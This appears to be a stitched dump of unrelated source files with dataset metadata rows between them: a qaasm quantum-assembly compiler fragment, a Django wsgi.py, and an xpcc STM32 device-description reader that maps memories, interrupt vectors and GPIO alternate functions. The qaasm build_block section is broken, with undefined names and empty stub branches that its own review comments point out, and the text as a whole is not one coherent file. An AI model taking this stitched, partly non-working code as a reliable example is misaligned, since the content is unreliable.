            # Classical keyword argument: must be a plain scalar; folds to a value.
            assert complex(kwargs[name]) == kwargs[name]
            return {"kind": "value_expn", "value": kwargs[name]}, [], []
        assert name in scope
        if ast["key"] is None:
            # Plain register reference.
            assert isinstance(scope[name], Register)
            return {"kind": "register_expn", "register": scope[name]}, [scope[name]], []
        # Array access: lower the index expression first.
        key, deps, arrs = process_qaasm_expn(ast["key"])
        assert len(arrs) == 0
        if key["kind"] == "value_expn":
            # Constant index: resolve to a concrete register at compile time.
            assert len(deps) == 0
            v = int(key["value"].real)
            if v < 0 or v >= len(scope[name]):
                raise IndexError("Array index '"+str(v)+"' out of range"+at(ast["loc"]))
            return {"kind": "register_expn", "register": scope[name][v]}, [scope[name][v]], []
        # Quantum index: the access depends on the key register itself.
        assert key["kind"] == "register_expn"
        assert len(deps) == 1
        assert deps[0] == key["register"]
        keydim = key["register"].dim
        if keydim >= len(scope[name]):
            # BUGFIX: a stray ']' made this assignment a SyntaxError.
            keyname = ast["key"]["identifier"]["value"]
            # BUGFIX: the message concatenated the dict `key` (TypeError);
            # use the array's name instead.
            raise IndexError("Array index register '"+keyname+"' dimension "+str(keydim)+" out of range"+\
                " for array '"+name+"' of length "+str(len(scope[name]))+error_at(ast["loc"],args))
        dim = scope[name][0].dim
        reg = Register(dim)
        out = {"kind": "register_expn", "register": reg}
        array = {"target": reg, "key": key["register"], "regs": [scope[name][i] for i in range(keydim)]}
        return out, deps+array["regs"], [array]
    if ast["kind"] == "scalar_expression":
        return {"kind": "value_expn", "value": ast["value"]}, [], []
    # Block-valued expressions are handled elsewhere, never here.
    assert ast["kind"] != "block_expression"
    assert ast["kind"] != "consume_expression"
    assert ast["kind"] != "create_expression"
    assert ast["kind"] != "adjoint_expression"
    if ast["kind"] == "parenthetical_expression":
        return process_qaasm_expn(ast["expn"])
    if ast["kind"] == "negate_expression":
        child, deps, arrs = process_qaasm_expn(ast["expn"])
        if child["kind"] == "value_expn":
            return {"kind": "value_expn", "value": -child["value"]}, [], []
        return {"kind": "negate_expn", "expn": child}, deps, arrs
    if ast["kind"] == "boolean_expression":
        # {"kind": "boolean_expn", "terms":[<linexp>, <string>, <linexp>, <string>, ...] }
        terms = []
        out_deps = []
        out_arrs = []
        for i in range(len(ast["terms"])):
            if i % 2 == 1:
                # Odd positions hold the comparison operators.
                assert ast["terms"][i] in ["==", "!=", "<", ">", ">=", "<="]
                terms.append(ast["terms"][i])
            else:
                expn, deps, arrs = process_qaasm_expn(ast["terms"][i])
                out_arrs += arrs
                for dep in deps:
                    if dep not in out_deps:
                        out_deps.append(dep)
                terms.append(expn)
        # Try to pre-evaluate: one known-false comparison folds the whole
        # expression to 0; if every comparison is known and true, fold to 1.
        all_values_known = True
        for i in range(len(ast["terms"])):
            if i % 2 == 1:
                if terms[i-1]["kind"] == "value_expn" and terms[i+1]["kind"] == "value_expn":
                    # NOTE(review): ordered comparisons (<, >, ...) raise
                    # TypeError on complex values -- presumably the folded
                    # values are always real here; confirm.
                    if terms[i] == "==": value = (terms[i-1]["value"] == terms[i+1]["value"])
                    elif terms[i] == "!=": value = (terms[i-1]["value"] != terms[i+1]["value"])
                    elif terms[i] == "<": value = (terms[i-1]["value"] < terms[i+1]["value"])
                    elif terms[i] == ">": value = (terms[i-1]["value"] > terms[i+1]["value"])
                    elif terms[i] == ">=": value = (terms[i-1]["value"] >= terms[i+1]["value"])
                    else:
                        assert terms[i] == "<="
                        value = (terms[i-1]["value"] <= terms[i+1]["value"])
                    if not value:
                        return {"kind": "value_expn", "value": complex(0)}, [], []
                else:
                    all_values_known = False
        if all_values_known:
            return {"kind": "value_expn", "value": complex(1)}, [], []
        return {"kind": "boolean_expn", "terms": terms}, out_deps, out_arrs
    if ast["kind"] == "sum_expression":
        # Fold all constant terms into one scalar; keep symbolic terms.
        scalar = None
        terms = []
        out_deps = []
        out_arrs = []
        for term in ast["terms"]:
            value, deps, arrs = process_qaasm_expn(term)
            out_arrs += arrs
            for dep in deps:
                if dep not in out_deps:
                    out_deps.append(dep)
            if value["kind"] == "value_expn":
                if scalar is None:
                    scalar = value["value"]
                else:
                    scalar += value["value"]
            else:
                terms.append(value)
        if len(terms) == 0:
            return {"kind": "value_expn", "value": scalar}, [], []
        if scalar is not None:
            terms.append({"kind": "value_expn", "value": scalar})
        return {"kind": "sum_expn", "terms": terms}, out_deps, out_arrs
    assert ast["kind"] != "tensorproduct_expression"
    if ast["kind"] == "product_expression":
        # Same constant-folding strategy as sums, with multiplication.
        scalar = None
        terms = []
        out_deps = []
        out_arrs = []
        for term in ast["terms"]:
            value, deps, arrs = process_qaasm_expn(term)
            out_arrs += arrs
            for dep in deps:
                if dep not in out_deps:
                    out_deps.append(dep)
            if value["kind"] == "value_expn":
                if scalar is None:
                    scalar = value["value"]
                else:
                    scalar *= value["value"]
            else:
                terms.append(value)
        if len(terms) == 0:
            return {"kind": "value_expn", "value": scalar}, [], []
        if scalar is not None:
            terms.append({"kind": "value_expn", "value": scalar})
        return {"kind": "product_expn", "terms": terms}, out_deps, out_arrs
    if ast["kind"] == "division_expression":
        dividend, deps, arrs = process_qaasm_expn(ast["dividend"])
        divisor, _, _ = process_qaasm_expn(ast["divisor"])
        # Division by a symbolic expression is not representable in qaasm.
        assert divisor["kind"] == "value_expn"
        if dividend["kind"] == "value_expn":
            return {"kind": "value_expn", "value": dividend["value"]/divisor["value"]}, [], []
        return {"kind": "division_expn", "dividend": dividend, "divisor": divisor["value"]}, deps, arrs
    if ast["kind"] == "modulo_expression":
        dividend, deps, arrs = process_qaasm_expn(ast["dividend"])
        divisor, _, _ = process_qaasm_expn(ast["divisor"])
        assert divisor["kind"] == "value_expn"
        v = divisor["value"]
        # The divisor must be real, integral and >= 1.
        bad = (v.real != v)
        if not bad: bad = int(v.real) != v
        if not bad: bad = int(v.real) < 1
        # BUGFIX: the computed `bad` flag was ignored (only `v.real != v` was
        # tested), letting non-integer and non-positive real divisors through.
        if bad:
            raise IndexError("Modulo divisor dimension "+str(v)+" must be a positive integer"+error_at(ast["loc"],args))
        v = int(v.real)
        if dividend["kind"] == "value_expn":
            # Honestly, I don't know what generalization of modulo to complex numbers I should pick.
            # There are some sensible candidates but none of them are obvious or standard.
            # But I need a modulo operation, so I'm going with this simple thing for now - should be replaced later:
            # Insist the divisor is a positive integer, and shift the real part of the dividend into the range [0,divisor).
            # According to the wikipedia article on modulo, languages vary wildly in their implementation of this operation.
            # Sadly the python implementation won't work for me because I need it to be well defined for any complex dividend.
            out = dividend["value"]
            while out.real < 0: out += v
            while out.real >= v.real: out -= v
            return {"kind": "value_expn", "value": out}, [], []
        # BUGFIX: this branch returned a bare dict; every other branch (and
        # every caller) expects the (expn, deps, arrs) triple.
        return {"kind": "modulo_expn", "dividend": dividend, "divisor": v}, deps, arrs
    if ast["kind"] == "exponent_expression":
        base, out_deps, out_arrs = process_qaasm_expn(ast["base"])
        exponent, deps, arrs = process_qaasm_expn(ast["exponent"])
        out_arrs += arrs
        for dep in deps:
            if dep not in out_deps:
                out_deps.append(dep)
        if base["kind"] == "value_expn" and exponent["kind"] == "value_expn":
            return {"kind": "value_expn", "value": base["value"] ** exponent["value"]}, [], []
        # NOTE(review): the exponent is stored under the key "divisor" -- this
        # looks like a copy/paste slip from the division branch, but the
        # downstream consumers are not visible here, so the key is preserved;
        # confirm against the qaasm module.
        return {"kind": "exponent_expn", "base": base, "divisor": exponent}, out_deps, out_arrs
    assert ast["kind"] != "tensorexponent_expression"
    assert False  # should be unreachable
########################################################################
def build_block(out,in_decls,out_decls,instrs,args,kwargs):
    """Assemble a block from declarations and instructions.

    NOTE(review): this function is clearly work-in-progress (the file lives
    under old/): most branches are empty stubs that return None, several
    names are undefined (see notes below), and the result is never populated.
    Documented as-is; do not rely on it.
    """
    scope = {}
    for decl in in_decls:
        # TODO: correct?
        # NOTE(review): `name` is undefined here — presumably this should use
        # `decl` (e.g. decl's name and dim) rather than `name`/`in_decls["dim"]`.
        scope[name] = Register(in_decls["dim"])
    #################
    # returns Blq
    def process_block_expn(ast,scope):
        # Evaluate a block-valued expression AST node. Only the
        # symbol_expression branch is partially implemented.
        if ast["kind"] == "symbol_expression":
            # NOTE(review): `name` is undefined in this scope; `blq` (lowercase)
            # is presumably the Blq class used below — confirm.
            if name in kwargs:
                assert isinstance(kwargs[name], blq)
                # don't need to copy, since all other evaluations copy
                return kwargs[name]
            assert name in scope
            expn, deps, arrs = process_qaasm_expn(ast)
            assert expn["kind"] == "register_expn"
            assert len(arrs) in [0,1]
            out = Blq()
            out.scale = expn["register"].dim
            if len(arrs) == 1:
                # NOTE(review): `b` is undefined; `qaasm_array_idx` appears to
                # be used as a context manager via explicit __enter__/__exit__.
                arr = qaasm_array_idx(b,arrs[0])
                arr.__enter__()
            for i in range(expn["register"].dim):
                tmp = Blq()
                # NOTE(review): bare name expression — a stub, has no effect.
                qaasm_postselect
            if len(arrs) == 1:
                arr.__exit__()
            return
        # All remaining branches are unimplemented stubs returning None.
        if ast["kind"] == "scalar_expression":
            return
        if ast["kind"] == "block_expression":
            return
        if ast["kind"] == "consume_expression":
            return
        if ast["kind"] == "create_expression":
            return
        if ast["kind"] == "adjoint_expression":
            return
        if ast["kind"] == "parenthetical_expression":
            return
        if ast["kind"] == "negate_expression":
            return
        if ast["kind"] == "boolean_expression":
            return
        if ast["kind"] == "sum_expression":
            return
        if ast["kind"] == "tensorproduct_expression":
            return
        if ast["kind"] == "product_expression":
            return
        if ast["kind"] == "division_expression":
            return
        if ast["kind"] == "modulo_expression":
            return
        if ast["kind"] == "exponent_expression":
            return
        if ast["kind"] == "tensorexponent_expression":
            return
        assert False # should be unreachable
    def process_instruction(ast):
        # Dispatch on instruction kind; every branch is an unimplemented stub.
        if ast["kind"] == "declare_instruction":
            return
        if ast["kind"] == "discard_instruction":
            return
        if ast["kind"] == "uncompute_instruction":
            return
        if ast["kind"] == "scalar_instruction":
            return
        if ast["kind"] == "pass_instruction":
            return
        if ast["kind"] == "repeat_instruction":
            return
        if ast["kind"] == "if_instruction":
            return
        if ast["kind"] == "init_instruction":
            return
        if ast["kind"] == "assign_instruction":
            return
        if ast["kind"] == "increment_instruction":
            return
        if ast["kind"] == "decrement_instruction":
            return
        assert False # should be unreachable
    #################
    for instr in instrs:
        process_instruction(instr)
    # package up outQaasm somehow?
    return out
| 33.258065
| 126
| 0.518348
|
4a10fdbc853a9040e70bdc2bb76df5065156f0f8
| 393
|
py
|
Python
|
bookshub/wsgi.py
|
jefferson2z/books-hub
|
9587deecec6b37305492874e2124578b75e6c5a2
|
[
"MIT"
] | null | null | null |
bookshub/wsgi.py
|
jefferson2z/books-hub
|
9587deecec6b37305492874e2124578b75e6c5a2
|
[
"MIT"
] | null | null | null |
bookshub/wsgi.py
|
jefferson2z/books-hub
|
9587deecec6b37305492874e2124578b75e6c5a2
|
[
"MIT"
] | 1
|
2021-12-23T21:15:40.000Z
|
2021-12-23T21:15:40.000Z
|
"""
WSGI config for bookshub project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Fall back to the project settings module unless the environment overrides it.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'bookshub.settings')
# Module-level WSGI callable that servers (gunicorn, uwsgi, ...) pick up.
application = get_wsgi_application()
| 23.117647
| 78
| 0.78626
|
4a10fe32f7f5f8a7b817f3a0647d664bf06ad3fd
| 17,379
|
py
|
Python
|
tools/device_file_generator/dfg/stm32/stm_reader.py
|
roboterclubaachen/xpcc
|
010924901947381d20e83b838502880eb2ffea72
|
[
"BSD-3-Clause"
] | 161
|
2015-01-13T15:52:06.000Z
|
2020-02-13T01:26:04.000Z
|
tools/device_file_generator/dfg/stm32/stm_reader.py
|
salkinium/xpcc
|
010924901947381d20e83b838502880eb2ffea72
|
[
"BSD-3-Clause"
] | 281
|
2015-01-06T12:46:40.000Z
|
2019-01-06T13:06:57.000Z
|
tools/device_file_generator/dfg/stm32/stm_reader.py
|
salkinium/xpcc
|
010924901947381d20e83b838502880eb2ffea72
|
[
"BSD-3-Clause"
] | 51
|
2015-03-03T19:56:12.000Z
|
2020-03-22T02:13:36.000Z
|
# -*- coding: utf-8 -*-
# Copyright (c) 2013, Roboterclub Aachen e.V.
# All rights reserved.
#
# The file is part of the xpcc library and is released under the 3-clause BSD
# license. See the file `LICENSE` for the full license governing this code.
# -----------------------------------------------------------------------------
import os
import re
from lxml import etree
from logger import Logger
from device_identifier import DeviceIdentifier
from ..reader import XMLDeviceReader
import stm
from .stm import stm32f1_remaps
from .stm import stm32_memory
class STMDeviceReader(XMLDeviceReader):
    """ STMDeviceReader
    This STM specific part description file reader knows the structure and
    translates the data into a platform independent format.
    """
    # Shared class state, populated by getDevicesFromFamily() before any
    # instance is created:
    #   familyFile - parsed 'families.xml' (an XMLDeviceReader)
    #   rootpath   - directory holding the ST 'mcu' description files
    familyFile = None
    rootpath = None

    @staticmethod
    def getDevicesFromFamily(family, logger=None, rootpath=None):
        # Return the RefNames of all devices belonging to `family`,
        # de-duplicated by package suffix. Also caches the parsed
        # families.xml and the root path on the class for later __init__ use.
        if rootpath is None:
            rootpath = os.path.join(os.path.dirname(__file__), '..', '..', '..', '..', '..', 'STM_devices', 'mcu')
        STMDeviceReader.rootpath = rootpath
        STMDeviceReader.familyFile = XMLDeviceReader(os.path.join(rootpath, 'families.xml'), logger)
        rawDevices = STMDeviceReader.familyFile.query("//Family[@Name='{}']/SubFamily/Mcu/@RefName".format(family))
        # devices can contain duplicates due to Hx, Tx, Yx, Ix suffix!
        # we treat them as single devices, since we don't care about the MCUs package
        devices = []
        for dev in rawDevices:
            shortDev = dev[:-2] if dev.endswith('x') else dev
            if all(not d.startswith(shortDev) for d in devices):
                devices.append(dev)
        # NOTE(review): logger is used unconditionally here although the
        # parameter defaults to None — confirm callers always pass a logger.
        logger.debug("STMDeviceReader: Found devices of family '{}': {}".format(family, ", ".join(devices)))
        return devices

    def __init__(self, deviceName, logger=None):
        """Parse one STM32 device description file into platform-independent
        properties (core, memories, defines, interrupt vectors, GPIO AFs).

        Requires getDevicesFromFamily() to have been called first, since it
        relies on the class-level familyFile and rootpath.
        """
        deviceNames = self.familyFile.query("//Family/SubFamily/Mcu[@RefName='{}']".format(deviceName))[0]
        comboDeviceName = deviceNames.get('Name')
        deviceFile = os.path.join(self.rootpath, comboDeviceName + '.xml')
        XMLDeviceReader.__init__(self, deviceFile, logger)
        self.name = deviceName
        self.id = DeviceIdentifier(self.name.lower())
        if logger:
            logger.info("STMDeviceReader: Parsing '{}'".format(self.id.string))

        # information about the core and architecture
        coreLut = {'m0': 'v6m', 'm0+': 'v6m', 'm3': 'v7m', 'm4': 'v7em', 'm7': 'v7em'}
        core = self.query('//Core')[0].text.replace('ARM ', '').lower()
        self.addProperty('architecture', coreLut[core.replace('cortex-', '')])
        # M4/M7 cores carry a single precision FPU ('f'); most F7 parts also
        # have double precision ('d'), except the 745/746/756.
        if core.endswith('m4') or core.endswith('m7'):
            core += 'f'
        if self.id.family in ['f7'] and self.id.name not in ['745', '746', '756']:
            core += 'd'
        self.addProperty('core', core)

        # flash and ram sizes
        # The <ram> and <flash> can occur multiple times.
        # they are "ordered" in the same way as the `(S-I-Z-E)` ids in the device combo name
        # we must first find out which index the current self.id.size_id has inside `(S-I-Z-E)`
        sizeIndexFlash = 0
        sizeIndexRam = 0
        matchString = "\(.(-.)*\)"
        match = re.search(matchString, comboDeviceName)
        if match:
            sizeArray = match.group(0)[1:-1].lower().split("-")
            sizeIndexFlash = sizeArray.index(self.id.size_id)
            sizeIndexRam = sizeIndexFlash
        rams = self.query("//Ram")
        if len(rams) <= sizeIndexRam:
            sizeIndexRam = 0
        flashs = self.query("//Flash")
        if len(flashs) <= sizeIndexFlash:
            sizeIndexFlash = 0

        # mem_start: start addresses of the memory regions;
        # mem_model: per-region size corrections/extras (in kB).
        mem_start, mem_model = stm.getMemoryForDevice(self.id)
        total_ram = ram = int(rams[sizeIndexRam].text) + mem_model['sram1']
        flash = int(flashs[sizeIndexFlash].text) + mem_model['flash']
        if 'ccm' in mem_model:
            total_ram += mem_model['ccm']
        if 'backup' in mem_model:
            total_ram += mem_model['backup']
        if 'itcm' in mem_model:
            # dtcm is only accounted for together with itcm here
            total_ram += mem_model['itcm']
            total_ram += mem_model['dtcm']
        self.addProperty('ram', total_ram * 1024)
        self.addProperty('flash', flash * 1024)

        memories = []
        # first get the real SRAM1 size
        for mem, val in mem_model.items():
            if any(s in mem for s in ['2', '3', 'dtcm']):
                ram -= val
        # add all memories
        for mem, val in mem_model.items():
            if '1' in mem:
                memories.append({'name': 'sram1',
                                 'access' : 'rwx',
                                 'start': "0x{:02X}".format(mem_start['sram' if 'sram' in mem_start else 'sram1']),
                                 'size': str(ram)})
            elif '2' in mem:
                memories.append({'name': 'sram2',
                                 'access' : 'rwx',
                                 'start': "0x{:02X}".format((mem_start['sram'] + ram * 1024) if 'sram' in mem_start else mem_start['sram2']),
                                 'size': str(val)})
            elif '3' in mem:
                memories.append({'name': 'sram3',
                                 'access': 'rwx',
                                 'start': "0x{:02X}".format(mem_start['sram'] + ram * 1024 + mem_model['sram2'] * 1024),
                                 'size': str(val)})
            elif 'flash' in mem:
                memories.append({'name': 'flash',
                                 'access': 'rx',
                                 'start': "0x{:02X}".format(mem_start['flash']),
                                 'size': str(flash)})
            else:
                # remaining regions (ccm, backup, itcm, dtcm, ...);
                # F4's CCM is not executable, hence 'rw' only there
                memories.append({'name': mem,
                                 'access': 'rw' if self.id.family == 'f4' and mem == 'ccm' else 'rwx',
                                 'start': "0x{:02X}".format(mem_start[mem]),
                                 'size': str(val)})
        self.addProperty('memories', memories)

        # packaging: e.g. "LQFP100" -> pin-count '100', package 'LQFP'
        package = self.query("//@Package")[0]
        self.addProperty('pin-count', re.findall('[0-9]+', package)[0])
        self.addProperty('package', re.findall('[A-Za-z\.]+', package)[0])

        # device header
        family_header = "stm32{}xx.h".format(self.id.family)
        self.addProperty('header', family_header)

        # device defines
        defines = []
        if self.id.family in ['f4']:
            # required for our FreeRTOS
            defines.append('STM32F4XX')
        # scan the CMSIS family header for the device-specific define
        cmsis_folder = os.path.join('..', '..', 'ext', 'st', "stm32{}xx".format(self.id.family), "Include")
        dev_def = None
        with open(os.path.join(cmsis_folder, family_header), 'r') as headerFile:
            match = re.findall("if defined\((?P<define>STM32[F|L].....)\)", headerFile.read())
            if match:
                dev_def = stm.getDefineForDevice(self.id, match)
        if dev_def is None:
            logger.error("STMDeviceReader: Define not found for device '{}'".format(self.id.string))
        else:
            defines.append(dev_def)
        self.addProperty('define', defines)

        # containers registered now, filled in below
        gpios = []
        self.addProperty('gpios', gpios)
        gpio_afs = []
        self.addProperty('gpio_afs', gpio_afs)
        # NOTE(review): 'peripherals' is registered but never filled in this
        # method — presumably populated by later processing; confirm.
        peripherals = []
        self.addProperty('peripherals', peripherals)
        modules = []
        self.addProperty('modules', modules)

        self.modules = self.query("//IP/@InstanceName")
        self.modules = sorted(list(set(self.modules)))
        self.log.debug("STMDeviceReader: Available Modules are:\n" + self._modulesToString())

        # add entire interrupt vector table here.
        # I have not found a way to extract the correct vector _position_ from the ST device files
        # so we have to swallow our pride and just parse the header file
        # ext/cmsis/stm32/Device/ST/STM32F4xx/Include/
        # NOTE(review): dev_def may still be None here if the error branch
        # above was taken — dev_def.lower() would then raise; confirm intent.
        headerFilePath = os.path.join('..', '..', 'ext', 'st', 'stm32{}xx'.format(self.id.family), 'Include', '{}.h'.format(dev_def.lower()))
        headerFile = open(headerFilePath, 'r').read()
        match = re.search("typedef enum.*?/\*\*.*?/\*\*.*?\*/(?P<table>.*?)} IRQn_Type;", headerFile, re.DOTALL)
        if not match:
            logger.error("STMDeviceReader: Interrupt vector table not found for device '{}'".format(self.id.string))
            exit(1)
        # print dev_def.lower(), match.group('table')

        ivectors = []
        for line in match.group('table').split('\n')[1:-1]:
            if '=' not in line: # avoid multiline comment
                continue
            # each line looks like "  Name_IRQn  = pos,  /*!< comment */"
            name, pos = line.split('/*!<')[0].split('=')
            pos = int(pos.strip(' ,'))
            name = name.strip()[:-5]
            # F3's vector 42 'USBWakeUp' is skipped deliberately
            if self.id.family in ['f3'] and pos == 42 and name == 'USBWakeUp':
                continue
            ivectors.append({'position': pos, 'name': name})
        self.log.debug("STMDeviceReader: Found interrupt vectors:\n" + "\n".join(["{}: {}".format(v['position'], v['name']) for v in ivectors]))
        self.addProperty('interrupts', ivectors)

        # only these IP instances are translated into xpcc modules
        our_instances = ['TIM', 'UART', 'USART', 'ADC', 'CAN', 'SPI', 'I2C', 'FSMC', 'FMC', 'RNG', 'RCC', 'USB']
        if self.id.family in ['l4']:
            # L4 doesn't support these
            our_instances.remove('FSMC')
            our_instances.remove('FMC')
        if self.id.family in ['f3', 'f4']:
            # Only F3, F4 supports DMA
            our_instances.append('DMA')
        for m in self.modules:
            if any(m.startswith(per) for per in our_instances):
                modules.append(m)
        if 'CAN' in modules:
            modules.append('CAN1')
        if self.id.family in ['f2', 'f3', 'f4', 'f7']:
            modules.append('ID')

        self.dmaFile = None
        if 'DMA' in modules:
            # lets load additional information about the DMA
            dma_file = self.query("//IP[@Name='DMA']")[0].get('Version')
            dma_file = os.path.join(self.rootpath, 'IP', 'DMA-' + dma_file + '_Modes.xml')
            self.dmaFile = XMLDeviceReader(dma_file, logger)
            dmas = [d.get('Name') for d in self.dmaFile.query("//IP/ModeLogicOperator/Mode[starts-with(@Name,'DMA')]")]
            modules.extend(dmas)

        # invertMode is only referenced by the commented-out SpiSlave code below
        invertMode = {'out': 'in', 'in': 'out', 'io': 'io'}
        nameToMode = {'rx': 'in', 'tx': 'out', 'cts': 'in', 'rts': 'out', 'ck': 'out', # Uart
                      'miso': 'in', 'mosi': 'out', 'nss': 'io', 'sck': 'out', # Spi
                      'scl': 'out', 'sda': 'io'} # I2c

        # lets load additional information about the GPIO IP
        ip_file = self.query("//IP[@Name='GPIO']")[0].get('Version')
        ip_file = os.path.join(self.rootpath, 'IP', 'GPIO-' + ip_file + '_Modes.xml')
        self.gpioFile = XMLDeviceReader(ip_file, logger)

        pins = self.query("//Pin[@Type='I/O'][starts-with(@Name,'P')]")
        # sort by port letter, then numerically by pin number
        pins = sorted(pins, key=lambda p: [p.get('Name')[1:2], int(p.get('Name')[:4].split('-')[0].split('/')[0][2:])])
        for pin in pins:
            name = pin.get('Name')

            # F1 does not have pin 'alternate functions' only pin 'remaps' which switch groups of pins
            if self.id.family == 'f1':
                pinSignals = self.gpioFile.compactQuery("//GPIO_Pin[@Name='{}']/PinSignal/RemapBlock/..".format(name))
                rawAltFunctions = {a.get('Name'): a[0].get('Name')[-1:] for a in pinSignals}
                altFunctions = {}
                for alt_name in rawAltFunctions:
                    # remap keys are either the peripheral alone or
                    # peripheral + signal (see stm32f1_remaps)
                    key = alt_name.split('_')[0].lower()
                    if key not in stm32f1_remaps:
                        key += alt_name.split('_')[1].lower()
                    if key in stm32f1_remaps:
                        mask = stm32f1_remaps[key]['mask']
                        pos = stm32f1_remaps[key]['position']
                        value = stm32f1_remaps[key]['mapping'][int(rawAltFunctions[alt_name])]
                        # encoded as "position,mask,value" for the writer
                        altFunctions[alt_name] = '{},{},{}'.format(pos, mask, value)
                # Add the rest of the pins
                allSignals = self.compactQuery("//Pin[@Name='{}']/Signal".format(name))
                for sig in allSignals:
                    if not any(sig.get('Name') in name.get('Name') for name in pinSignals):
                        pinSignals.append(sig)
            else: # F0, F3, F4 and F7
                pinSignals = self.gpioFile.compactQuery("//GPIO_Pin[@Name='%s']/PinSignal/SpecificParameter[@Name='GPIO_AF']/.." % name)
                altFunctions = { a.get('Name') : a[0][0].text.replace('GPIO_AF', '')[:2].replace('_', '') for a in pinSignals }
                # the analog channels are only available in the Mcu file, not the GPIO file
                analogSignals = self.compactQuery("//Pin[@Name='{}']/Signal[starts-with(@Name,'ADC')]".format(name))
                pinSignals.extend(analogSignals)

            # strip package variants like 'PA0-WKUP' or 'PC14/OSC32_IN'
            name = name[:4].split('-')[0].split('/')[0].strip()
            gpio = {'port': name[1:2], 'id': name[2:]}
            gpios.append(gpio)

            afs = []
            for signal in [s.get('Name') for s in pinSignals]:
                raw_names = signal.split('_')
                if len(raw_names) < 2:
                    continue
                # ignore signals of peripherals we did not whitelist above
                if not any(m.startswith(raw_names[0]) for m in modules):
                    continue
                instance = raw_names[0][-1]
                if not instance.isdigit():
                    instance = ""
                name = raw_names[1].lower()
                mode = None
                if name in nameToMode and nameToMode[name] != 'io':
                    mode = nameToMode[name]
                af_id = None
                if signal in altFunctions:
                    af_id = altFunctions[signal]

                if signal.startswith('USART') or signal.startswith('UART'):
                    af = {'peripheral' : 'Uart' + instance,
                          'name': name.capitalize()}
                    if mode:
                        af.update({'type': mode})
                    if af_id:
                        af.update({'id': af_id})
                    afs.append(af)
                    # USARTs can also be driven as SPI masters
                    mapName = {'rx': 'miso', 'tx': 'mosi', 'ck': 'sck'}
                    if signal.startswith('USART') and name in mapName:
                        af = {'peripheral' : 'UartSpiMaster' + instance,
                              'name': mapName[name].capitalize()}
                        if mode:
                            af.update({'type': mode})
                        if af_id:
                            af.update({'id': af_id})
                        afs.append(af)
                elif signal.startswith('SPI'):
                    af = {'peripheral' : 'SpiMaster' + instance,
                          'name': name.capitalize()}
                    if mode:
                        af.update({'type': mode})
                    if af_id:
                        af.update({'id': af_id})
                    afs.append(dict(af))
                    # invertName = {'miso': 'somi', 'mosi': 'simo', 'nss': 'nss', 'sck': 'sck'}
                    # af.update({ 'peripheral' : 'SpiSlave' + instance,
                    #             'name': invertName[name].capitalize()})
                    # if mode:
                    #     af.update({'type': invertMode[nameToMode[name]]})
                    # afs.append(af)
                if signal.startswith('CAN'):
                    if instance == '':
                        instance = '1'
                    af = {'peripheral' : 'Can' + instance,
                          'name': name.capitalize()}
                    if mode:
                        af.update({'type': mode})
                    if af_id:
                        af.update({'id': af_id})
                    afs.append(af)
                if signal.startswith('RCC'):
                    if 'MCO' in signal:
                        device_id = "" if len(raw_names) < 3 else raw_names[2]
                        af = {'peripheral': 'ClockOutput' + device_id}
                        af.update({'type': 'out'})
                        if af_id:
                            af.update({'id': af_id})
                        afs.append(af)
                if signal.startswith('I2C'):
                    if name in ['scl', 'sda']:
                        af = {'peripheral' : 'I2cMaster' + instance,
                              'name': name.capitalize()}
                        if mode:
                            af.update({'type': mode})
                        if af_id:
                            af.update({'id': af_id})
                        afs.append(af)
                if signal.startswith('TIM'):
                    # one AF per timer sub-signal (channels, break-in, trigger)
                    for tname in raw_names[1:]:
                        tinstance = raw_names[0].replace('TIM', '')
                        nice_name = 'ExternalTrigger'
                        output_type = 'in'
                        if 'CH' in tname:
                            nice_name = tname.replace('CH', 'Channel')
                            output_type = None
                        elif 'BKIN' in tname:
                            nice_name = ''.join(raw_names[1:])
                            nice_name = nice_name.replace('BKIN', 'BreakIn').replace('COMP', 'Comp')
                        af = {'peripheral' : 'Timer' + tinstance,
                              'name': nice_name}
                        if output_type:
                            af.update({'type': output_type})
                        if af_id:
                            af.update({'id': af_id})
                        afs.append(af)
                if signal.startswith('ADC'):
                    if 'exti' not in name:
                        af = {'peripheral' : 'Adc' + instance,
                              'name': name.replace('in', 'Channel').capitalize(),
                              'type': 'analog'}
                        afs.append(af)
                if signal.startswith('SYS'):
                    if 'mco' in name:
                        af = {'peripheral' : signal.replace('SYS', '').replace('_', ''),
                              'type': 'out',
                              'id': '0'}
                        afs.append(af)
                if signal.startswith('USB_OTG_FS') and raw_names[3] in ['DM', 'DP']:
                    af = {'peripheral' : 'Usb',
                          'name': raw_names[3].capitalize()}
                    if af_id:
                        af.update({'id': af_id})
                    else:
                        # USB AF is 10 when the GPIO file does not specify it
                        af.update({'id': '10'})
                    afs.append(af)
                if signal.startswith('USB_') and raw_names[1] in ['DM', 'DP']:
                    af = {'peripheral': 'Usb',
                          'name': raw_names[1].capitalize()}
                    if af_id:
                        af.update({'id': af_id})
                    # For the STM32F1 the USB pins aren't enabled like other
                    # alternative functions, but by simply enabling the USB core.
                    # else:
                    #     af.update({'id': '10'})
                    afs.append(af)
                if signal.startswith('FSMC_') or signal.startswith('FMC_'):
                    if not raw_names[1].startswith('DA'):
                        af = {'peripheral' : 'Fsmc',
                              'name': raw_names[1].capitalize()}
                        if af_id:
                            af.update({'id': af_id})
                        afs.append(af)

            # sort after key id and then add all without ids
            # this sorting only affect the way the debug information is displayed
            # in stm_writer the AFs are sorted again anyway
            sorted_afs = [a for a in afs if 'id' in a]
            sorted_afs.sort(key=lambda k: (int(k['id'].split(',')[0]), k['peripheral']))
            sorted_afs.extend([a for a in afs if 'id' not in a])
            for af in sorted_afs:
                af['gpio_port'] = gpio['port']
                af['gpio_id'] = gpio['id']
                gpio_afs.append(af)

        # the generic 'CAN' entry was only needed during AF matching above
        if 'CAN' in modules:
            modules.remove('CAN')

    def _modulesToString(self):
        # Format self.modules for debug output: tab separated, with a line
        # break whenever the leading character changes (groups peripherals).
        string = ""
        char = self.modules[0][0:1]
        for module in self.modules:
            if not module.startswith(char):
                string += "\n"
            string += module + " \t"
            char = module[0][0:1]
        return string

    def _getDeviceDefine(self):
        # Find the CMSIS preprocessor define matching this device.
        # NOTE(review): `stm32_defines` is not among this module's visible
        # imports (only stm32f1_remaps/stm32_memory are) — presumably
        # exported by `.stm`; confirm it is in scope.
        if self.id.family not in stm32_defines:
            return None
        # get the defines for this device family
        familyDefines = stm32_defines[self.id.family]
        # get all defines for this device name
        devName = 'STM32{}{}'.format(self.id.family[0].upper(), self.id.name)
        # Map STM32F7x8 -> STM32F7x7
